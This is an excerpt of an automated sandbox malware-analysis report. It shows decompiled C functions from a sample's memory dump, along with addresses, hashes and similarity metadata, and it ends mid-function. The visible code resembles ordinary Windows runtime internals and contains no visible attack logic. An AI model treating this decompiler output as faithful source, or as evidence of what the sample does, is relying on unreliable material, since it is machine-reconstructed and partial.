                                                                                                            					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                                                            					_t83 =  *_t75;
                                                                                                            					_t54 = _t75[1];
                                                                                                            					 *_t101 = _t83;
                                                                                                            					_t84 = _t83 | _t54;
                                                                                                            					_t101[1] = _t54;
                                                                                                            					if(_t84 == 0) {
                                                                                                            						_t101[1] = _t101[1] & _t84;
                                                                                                            						 *_t101 = 1;
                                                                                                            					}
                                                                                                            					goto L19;
                                                                                                            				} else {
                                                                                                            					if(_t101 == 0) {
                                                                                                            						E0106CC50(E01064510(0xc000000d));
                                                                                                            						_t88 =  *_t101;
                                                                                                            						_t97 = _t101[1];
                                                                                                            						L15:
                                                                                                            						_v12 = _t88;
                                                                                                            						_t66 = _t88 -  *_t75;
                                                                                                            						_t89 = _t97;
                                                                                                            						asm("sbb ecx, [ebx+0x4]");
                                                                                                            						_t118 = _t89 - _t97;
                                                                                                            						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                                                            							_t66 = _t66 | 0xffffffff;
                                                                                                            							_t89 = 0x7fffffff;
                                                                                                            						}
                                                                                                            						 *_t101 = _t66;
                                                                                                            						_t101[1] = _t89;
                                                                                                            						L19:
                                                                                                            						if(E01087D50() != 0) {
                                                                                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            						} else {
                                                                                                            							_t58 = 0x7ffe0386;
                                                                                                            						}
                                                                                                            						_t102 = _v16;
                                                                                                            						if( *_t58 != 0) {
                                                                                                            							_t58 = E01138ED6(_t102, _t98);
                                                                                                            						}
                                                                                                            						_t76 = _v44;
                                                                                                            						E01082280(_t58, _v44);
                                                                                                            						E0108DD82(_v44, _t102, _t98);
                                                                                                            						E0108B944(_t102, _v5);
                                                                                                            						return E0107FFB0(_t76, _t98, _t76);
                                                                                                            					}
                                                                                                            					_t99 = 0x7ffe03b0;
                                                                                                            					do {
                                                                                                            						_t103 = 0x7ffe0010;
                                                                                                            						do {
                                                                                                            							_t67 =  *0x1158628; // 0x0
                                                                                                            							_v28 = _t67;
                                                                                                            							_t68 =  *0x115862c; // 0x0
                                                                                                            							_v32 = _t68;
                                                                                                            							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                                                            							_v20 =  *_t99;
                                                                                                            							while(1) {
                                                                                                            								_t97 =  *0x7ffe000c;
                                                                                                            								_t90 =  *0x7FFE0008;
                                                                                                            								if(_t97 ==  *_t103) {
                                                                                                            									goto L10;
                                                                                                            								}
                                                                                                            								asm("pause");
                                                                                                            							}
                                                                                                            							L10:
                                                                                                            							_t79 = _v24;
                                                                                                            							_t99 = 0x7ffe03b0;
                                                                                                            							_v12 =  *0x7ffe03b0;
                                                                                                            							_t72 =  *0x7FFE03B4;
                                                                                                            							_t103 = 0x7ffe0010;
                                                                                                            							_v36 = _t72;
                                                                                                            						} while (_v20 != _v12 || _t79 != _t72);
                                                                                                            						_t73 =  *0x1158628; // 0x0
                                                                                                            						_t105 = _v28;
                                                                                                            						_t80 =  *0x115862c; // 0x0
                                                                                                            					} while (_t105 != _t73 || _v32 != _t80);
                                                                                                            					_t98 = _v40;
                                                                                                            					asm("sbb edx, [ebp-0x20]");
                                                                                                            					_t88 = _t90 - _v12 - _t105;
                                                                                                            					_t75 = _a4;
                                                                                                            					asm("sbb edx, eax");
                                                                                                            					_t31 = _t98 + 0xc8; // 0x112fb53
                                                                                                            					_t101 = _t31;
                                                                                                            					 *_t101 = _t88;
                                                                                                            					_t101[1] = _t97;
                                                                                                            					goto L15;
                                                                                                            				}
                                                                                                            			}










































                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab6ae14bf3f2a0d7ca559090c0d02f8aa275ad6084648eed94d23ec369f4b3f9
                                                                                                            • Instruction ID: 38aaf1e45c80fe048cc99ee2b8bc8aff2cc611412ccecba042d4c239ac4bf294
                                                                                                            • Opcode Fuzzy Hash: ab6ae14bf3f2a0d7ca559090c0d02f8aa275ad6084648eed94d23ec369f4b3f9
                                                                                                            • Instruction Fuzzy Hash: ED519171A04706DFCB14EFACC490A9EBBF1BF48310F248259D5D5AB385DB30A944CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E0107EF40(intOrPtr __ecx) {
                                                                                                            				char _v5;
                                                                                                            				char _v6;
                                                                                                            				char _v7;
                                                                                                            				char _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t58;
                                                                                                            				char _t59;
                                                                                                            				signed char _t69;
                                                                                                            				void* _t73;
                                                                                                            				signed int _t74;
                                                                                                            				char _t79;
                                                                                                            				signed char _t81;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t87;
                                                                                                            				intOrPtr _t90;
                                                                                                            				signed char* _t91;
                                                                                                            				void* _t92;
                                                                                                            				signed int _t94;
                                                                                                            				void* _t96;
                                                                                                            
                                                                                                            				_t90 = __ecx;
                                                                                                            				_v16 = __ecx;
                                                                                                            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                                                            					_t58 =  *((intOrPtr*)(__ecx));
                                                                                                            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                                                            						E01069080(_t73, __ecx, __ecx, _t92);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t74 = 0;
                                                                                                            				_t96 =  *0x7ffe036a - 1;
                                                                                                            				_v12 = 0;
                                                                                                            				_v7 = 0;
                                                                                                            				if(_t96 > 0) {
                                                                                                            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                                                            					_v12 = _t74;
                                                                                                            					_v7 = _t96 != 0;
                                                                                                            				}
                                                                                                            				_t79 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_v5 = 0;
                                                                                                            				while(1) {
                                                                                                            					L4:
                                                                                                            					_t59 = 1;
                                                                                                            					L5:
                                                                                                            					while(1) {
                                                                                                            						if(_t59 == 0) {
                                                                                                            							L12:
                                                                                                            							_t21 = _t90 + 4; // 0x7738c21e
                                                                                                            							_t87 =  *_t21;
                                                                                                            							_v6 = 0;
                                                                                                            							if(_t79 != 0) {
                                                                                                            								if((_t87 & 0x00000002) != 0) {
                                                                                                            									goto L19;
                                                                                                            								}
                                                                                                            								if((_t87 & 0x00000001) != 0) {
                                                                                                            									_v6 = 1;
                                                                                                            									_t74 = _t87 ^ 0x00000003;
                                                                                                            								} else {
                                                                                                            									_t51 = _t87 - 2; // -2
                                                                                                            									_t74 = _t51;
                                                                                                            								}
                                                                                                            								goto L15;
                                                                                                            							} else {
                                                                                                            								if((_t87 & 0x00000001) != 0) {
                                                                                                            									_v6 = 1;
                                                                                                            									_t74 = _t87 ^ 0x00000001;
                                                                                                            								} else {
                                                                                                            									_t26 = _t87 - 4; // -4
                                                                                                            									_t74 = _t26;
                                                                                                            									if((_t74 & 0x00000002) == 0) {
                                                                                                            										_t74 = _t74 - 2;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L15:
                                                                                                            								if(_t74 == _t87) {
                                                                                                            									L19:
                                                                                                            									E01062D8A(_t74, _t90, _t87, _t90);
                                                                                                            									_t74 = _v12;
                                                                                                            									_v8 = 1;
                                                                                                            									if(_v7 != 0 && _t74 > 0x64) {
                                                                                                            										_t74 = _t74 - 1;
                                                                                                            										_v12 = _t74;
                                                                                                            									}
                                                                                                            									_t79 = _v5;
                                                                                                            									goto L4;
                                                                                                            								}
                                                                                                            								asm("lock cmpxchg [esi], ecx");
                                                                                                            								if(_t87 != _t87) {
                                                                                                            									_t74 = _v12;
                                                                                                            									_t59 = 0;
                                                                                                            									_t79 = _v5;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								if(_v6 != 0) {
                                                                                                            									_t74 = _v12;
                                                                                                            									L25:
                                                                                                            									if(_v7 != 0) {
                                                                                                            										if(_t74 < 0x7d0) {
                                                                                                            											if(_v8 == 0) {
                                                                                                            												_t74 = _t74 + 1;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										_t38 = _t90 + 0x14; // 0x0
                                                                                                            										_t39 = _t90 + 0x14; // 0x0
                                                                                                            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                                                            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                            											_t85 = _t85 & 0xff000000;
                                                                                                            										}
                                                                                                            										 *(_t90 + 0x14) = _t85;
                                                                                                            									}
                                                                                                            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                            									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                                                            									return 0;
                                                                                                            								}
                                                                                                            								_v5 = 1;
                                                                                                            								_t87 = _t74;
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t94 = _t74;
                                                                                                            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                                                            						if(_t74 == 0) {
                                                                                                            							goto L12;
                                                                                                            						} else {
                                                                                                            							_t91 = _t90 + 4;
                                                                                                            							goto L8;
                                                                                                            							L9:
                                                                                                            							while((_t81 & 0x00000001) != 0) {
                                                                                                            								_t69 = _t81;
                                                                                                            								asm("lock cmpxchg [edi], edx");
                                                                                                            								if(_t69 != _t81) {
                                                                                                            									_t81 = _t69;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								_t90 = _v16;
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							asm("pause");
                                                                                                            							_t94 = _t94 - 1;
                                                                                                            							if(_t94 != 0) {
                                                                                                            								L8:
                                                                                                            								_t81 =  *_t91;
                                                                                                            								goto L9;
                                                                                                            							} else {
                                                                                                            								_t90 = _v16;
                                                                                                            								_t79 = _v5;
                                                                                                            								goto L12;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x00000000
                                                                                                            0x0107efb2
                                                                                                            0x0107f036
                                                                                                            0x0107f03a
                                                                                                            0x0107f040
                                                                                                            0x0107f090
                                                                                                            0x00000000
                                                                                                            0x0107f092
                                                                                                            0x0107f042
                                                                                                            0x00000000
                                                                                                            0x0107f042
                                                                                                            0x0107efb7
                                                                                                            0x0107efb9
                                                                                                            0x0107efbc
                                                                                                            0x0107efb0
                                                                                                            0x0107efb0
                                                                                                            0x00000000
                                                                                                            0x0107efbe
                                                                                                            0x0107efbe
                                                                                                            0x0107efc1
                                                                                                            0x00000000
                                                                                                            0x0107efc1
                                                                                                            0x0107efbc
                                                                                                            0x0107efaa
                                                                                                            0x0107ef91

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                            • Instruction ID: ae9cd1b15d4bdb553741a6dab2b1039634cd67e178afbb34fe9bd7f74ce08e04
                                                                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                            • Instruction Fuzzy Hash: 6751F330E0524A9FEB62CB6CC0D07AEBBF1AF05314F1881E8E5E553382C375A989C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E0113740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                                                            				signed short* _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _t55;
                                                                                                            				void* _t56;
                                                                                                            				intOrPtr* _t66;
                                                                                                            				intOrPtr* _t69;
                                                                                                            				void* _t74;
                                                                                                            				intOrPtr* _t78;
                                                                                                            				intOrPtr* _t81;
                                                                                                            				intOrPtr* _t82;
                                                                                                            				intOrPtr _t83;
                                                                                                            				signed short* _t84;
                                                                                                            				intOrPtr _t85;
                                                                                                            				signed int _t87;
                                                                                                            				intOrPtr* _t90;
                                                                                                            				intOrPtr* _t93;
                                                                                                            				intOrPtr* _t94;
                                                                                                            				void* _t98;
                                                                                                            
                                                                                                            				_t84 = __edx;
                                                                                                            				_t80 = __ecx;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t55 = __ecx;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t87 =  *__edx & 0x0000ffff;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_t3 = _t55 + 0x154; // 0x154
                                                                                                            				_t93 = _t3;
                                                                                                            				_t78 =  *_t93;
                                                                                                            				_t4 = _t87 + 2; // 0x2
                                                                                                            				_t56 = _t4;
                                                                                                            				while(_t78 != _t93) {
                                                                                                            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                                                            						L4:
                                                                                                            						_t78 =  *_t78;
                                                                                                            						continue;
                                                                                                            					} else {
                                                                                                            						_t7 = _t78 + 0x18; // 0x18
                                                                                                            						if(E010BD4F0(_t7, _t84[2], _t87) == _t87) {
                                                                                                            							_t40 = _t78 + 0xc; // 0xc
                                                                                                            							_t94 = _t40;
                                                                                                            							_t90 =  *_t94;
                                                                                                            							while(_t90 != _t94) {
                                                                                                            								_t41 = _t90 + 8; // 0x8
                                                                                                            								_t74 = E010AF380(_a4, _t41, 0x10);
                                                                                                            								_t98 = _t98 + 0xc;
                                                                                                            								if(_t74 != 0) {
                                                                                                            									_t90 =  *_t90;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L12;
                                                                                                            							}
                                                                                                            							_t82 = L01084620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                            							if(_t82 != 0) {
                                                                                                            								_t46 = _t78 + 0xc; // 0xc
                                                                                                            								_t69 = _t46;
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								_t85 =  *_t69;
                                                                                                            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                            									L20:
                                                                                                            									_t82 = 3;
                                                                                                            									asm("int 0x29");
                                                                                                            								}
                                                                                                            								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                                                            								 *_t82 = _t85;
                                                                                                            								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                                                            								 *_t69 = _t82;
                                                                                                            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                                                            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                                                            								goto L11;
                                                                                                            							} else {
                                                                                                            								L18:
                                                                                                            								_push(0xe);
                                                                                                            								_pop(0);
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t84 = _v8;
                                                                                                            							_t9 = _t87 + 2; // 0x2
                                                                                                            							_t56 = _t9;
                                                                                                            							goto L4;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L12:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t10 = _t87 + 0x1a; // 0x1a
                                                                                                            				_t78 = L01084620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                                                            				if(_t78 == 0) {
                                                                                                            					goto L18;
                                                                                                            				} else {
                                                                                                            					_t12 = _t87 + 2; // 0x2
                                                                                                            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                                                            					_t16 = _t78 + 0x18; // 0x18
                                                                                                            					E010AF3E0(_t16, _v8[2], _t87);
                                                                                                            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                                                            					_t19 = _t78 + 0xc; // 0xc
                                                                                                            					_t66 = _t19;
                                                                                                            					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                                                            					 *_t66 = _t66;
                                                                                                            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                                                            					_t81 = L01084620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                            					if(_t81 == 0) {
                                                                                                            						goto L18;
                                                                                                            					} else {
                                                                                                            						_t26 = _t78 + 0xc; // 0xc
                                                                                                            						_t69 = _t26;
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						asm("movsd");
                                                                                                            						_t85 =  *_t69;
                                                                                                            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                            							goto L20;
                                                                                                            						} else {
                                                                                                            							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                                                            							 *_t81 = _t85;
                                                                                                            							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                                                            							 *_t69 = _t81;
                                                                                                            							_t83 = _v12;
                                                                                                            							 *(_t78 + 8) = 1;
                                                                                                            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                            							_t34 = _t83 + 0x154; // 0x1ba
                                                                                                            							_t69 = _t34;
                                                                                                            							_t85 =  *_t69;
                                                                                                            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                            								goto L20;
                                                                                                            							} else {
                                                                                                            								 *_t78 = _t85;
                                                                                                            								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                                                            								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                                                            								 *_t69 = _t78;
                                                                                                            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				goto L12;
                                                                                                            			}





















                                                                                                            0x00000000
                                                                                                            0x0113744c
                                                                                                            0x01137443
                                                                                                            0x0113750e
                                                                                                            0x01137514
                                                                                                            0x01137514
                                                                                                            0x01137455
                                                                                                            0x01137469
                                                                                                            0x0113746d
                                                                                                            0x00000000
                                                                                                            0x01137473
                                                                                                            0x01137473
                                                                                                            0x01137476
                                                                                                            0x01137480
                                                                                                            0x01137484
                                                                                                            0x0113748e
                                                                                                            0x01137493
                                                                                                            0x01137493
                                                                                                            0x01137496
                                                                                                            0x01137499
                                                                                                            0x011374a1
                                                                                                            0x011374b1
                                                                                                            0x011374b5
                                                                                                            0x00000000
                                                                                                            0x011374bb
                                                                                                            0x011374c1
                                                                                                            0x011374c1
                                                                                                            0x011374c4
                                                                                                            0x011374c5
                                                                                                            0x011374c6
                                                                                                            0x011374c7
                                                                                                            0x011374c8
                                                                                                            0x011374cd
                                                                                                            0x00000000
                                                                                                            0x011374d3
                                                                                                            0x011374d3
                                                                                                            0x011374d6
                                                                                                            0x011374d8
                                                                                                            0x011374db
                                                                                                            0x011374dd
                                                                                                            0x011374e0
                                                                                                            0x011374e7
                                                                                                            0x011374ee
                                                                                                            0x011374ee
                                                                                                            0x011374f4
                                                                                                            0x011374f9
                                                                                                            0x00000000
                                                                                                            0x011374fb
                                                                                                            0x011374fb
                                                                                                            0x011374fd
                                                                                                            0x01137500
                                                                                                            0x01137503
                                                                                                            0x01137505
                                                                                                            0x01137505
                                                                                                            0x011374f9
                                                                                                            0x00000000
                                                                                                            0x011374cd
                                                                                                            0x011374b5
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                            • Instruction ID: 8511924e089677b8aa340e42238175875c2b319697eaf4dfc54ee02a10c62987
                                                                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                            • Instruction Fuzzy Hash: FF518FB1600646EFDB1ACF58D480A96BBF5FF85304F15C0AAE908DF296E371E945CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E01092990() {
                                                                                                            				signed int* _t62;
                                                                                                            				signed int _t64;
                                                                                                            				intOrPtr _t66;
                                                                                                            				signed short* _t69;
                                                                                                            				intOrPtr _t76;
                                                                                                            				signed short* _t79;
                                                                                                            				void* _t81;
                                                                                                            				signed int _t82;
                                                                                                            				signed short* _t83;
                                                                                                            				signed int _t87;
                                                                                                            				intOrPtr _t91;
                                                                                                            				void* _t98;
                                                                                                            				signed int _t99;
                                                                                                            				void* _t101;
                                                                                                            				signed int* _t102;
                                                                                                            				void* _t103;
                                                                                                            				void* _t104;
                                                                                                            				void* _t107;
                                                                                                            
                                                                                                            				_push(0x20);
                                                                                                            				_push(0x113ff00);
                                                                                                            				E010BD08C(_t81, _t98, _t101);
                                                                                                            				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                                                            				_t99 = 0;
                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                                                            				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                                                            				if(_t82 == 0) {
                                                                                                            					_t62 = 0xc0000100;
                                                                                                            				} else {
                                                                                                            					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                                                            					_t102 = 0xc0000100;
                                                                                                            					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                                                            					_t64 = 4;
                                                                                                            					while(1) {
                                                                                                            						 *(_t103 - 0x24) = _t64;
                                                                                                            						if(_t64 == 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t87 = _t64 * 0xc;
                                                                                                            						 *(_t103 - 0x2c) = _t87;
                                                                                                            						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1041664));
                                                                                                            						if(_t107 <= 0) {
                                                                                                            							if(_t107 == 0) {
                                                                                                            								_t79 = E010AE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1041668)), _t82);
                                                                                                            								_t104 = _t104 + 0xc;
                                                                                                            								__eflags = _t79;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t102 = E010E51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x104166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                                            									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                                                            									break;
                                                                                                            								} else {
                                                                                                            									_t64 =  *(_t103 - 0x24);
                                                                                                            									goto L5;
                                                                                                            								}
                                                                                                            								goto L13;
                                                                                                            							} else {
                                                                                                            								L5:
                                                                                                            								_t64 = _t64 - 1;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                            					__eflags = _t102;
                                                                                                            					if(_t102 < 0) {
                                                                                                            						__eflags = _t102 - 0xc0000100;
                                                                                                            						if(_t102 == 0xc0000100) {
                                                                                                            							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                                            							__eflags = _t83;
                                                                                                            							if(_t83 != 0) {
                                                                                                            								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                                                            								__eflags =  *_t83 - _t99;
                                                                                                            								if( *_t83 == _t99) {
                                                                                                            									_t102 = 0xc0000100;
                                                                                                            									goto L19;
                                                                                                            								} else {
                                                                                                            									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                                                            									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                                                            									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                                                            									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                                                            										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                                                            										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                                                            											L26:
                                                                                                            											_t102 = E01092AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                                            											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                            											__eflags = _t102 - 0xc0000100;
                                                                                                            											if(_t102 != 0xc0000100) {
                                                                                                            												goto L12;
                                                                                                            											} else {
                                                                                                            												_t99 = 1;
                                                                                                            												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                                                            												goto L18;
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											_t69 = E01076600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                                                            											__eflags = _t69;
                                                                                                            											if(_t69 != 0) {
                                                                                                            												goto L26;
                                                                                                            											} else {
                                                                                                            												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                                            												goto L18;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										L18:
                                                                                                            										_t102 = E01092C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                                                            										L19:
                                                                                                            										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                            										goto L12;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L28:
                                                                                                            							} else {
                                                                                                            								E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                                                            								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                                                            								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                                                            								_t76 = E01092AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                                                            								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                                                            								__eflags = _t76 - 0xc0000100;
                                                                                                            								if(_t76 == 0xc0000100) {
                                                                                                            									 *((intOrPtr*)(_t103 - 0x1c)) = E01092C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                                                            								}
                                                                                                            								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                                                            								E01092ACB();
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L12:
                                                                                                            					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                                                            					_t62 = _t102;
                                                                                                            				}
                                                                                                            				L13:
                                                                                                            				return E010BD0D1(_t62);
                                                                                                            				goto L28;
                                                                                                            			}






















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E01094BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				short _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v156;
                                                                                                            				short _v158;
                                                                                                            				intOrPtr _v160;
                                                                                                            				char _v164;
                                                                                                            				intOrPtr _v168;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t45;
                                                                                                            				intOrPtr _t74;
                                                                                                            				signed char _t77;
                                                                                                            				intOrPtr _t84;
                                                                                                            				char* _t85;
                                                                                                            				void* _t86;
                                                                                                            				intOrPtr _t87;
                                                                                                            				signed short _t88;
                                                                                                            				signed int _t89;
                                                                                                            
                                                                                                            				_t83 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t89;
                                                                                                            				_t45 = _a8 & 0x0000ffff;
                                                                                                            				_v158 = __edx;
                                                                                                            				_v168 = __ecx;
                                                                                                            				if(_t45 == 0) {
                                                                                                            					L22:
                                                                                                            					_t86 = 6;
                                                                                                            					L12:
                                                                                                            					E0106CC50(_t86);
                                                                                                            					L11:
